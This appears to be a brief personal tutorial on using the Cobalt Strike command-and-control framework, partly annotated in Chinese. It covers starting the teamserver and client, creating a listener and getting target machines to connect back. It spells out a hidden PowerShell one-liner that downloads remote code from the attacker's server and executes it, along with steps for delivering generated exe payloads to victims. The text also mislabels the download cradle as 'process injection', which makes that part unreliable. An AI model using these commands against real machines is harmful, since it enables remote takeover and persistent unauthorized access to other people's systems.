./teamserver 192.168.137.4 # 启动服务端
./cobaltstrike # 启动客户端
First create a listening Listener
1. exe
After generating the exe file, pass it to the target machine and let it execute
2. powershell
Execute the following piece of code in the target machine, which is the remote malicious file loading
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.137.4:80/a'))"
After execution, the powershell process will be hidden, and CS will go online successfully. This seems to be called process injection.
3. exe
It is basically the same as the second one. The second one uses the powershell process.
This generates an exe file and lets the target machine download it and execute it.
Compared with the first exe method, no http service is provided, which is more convenient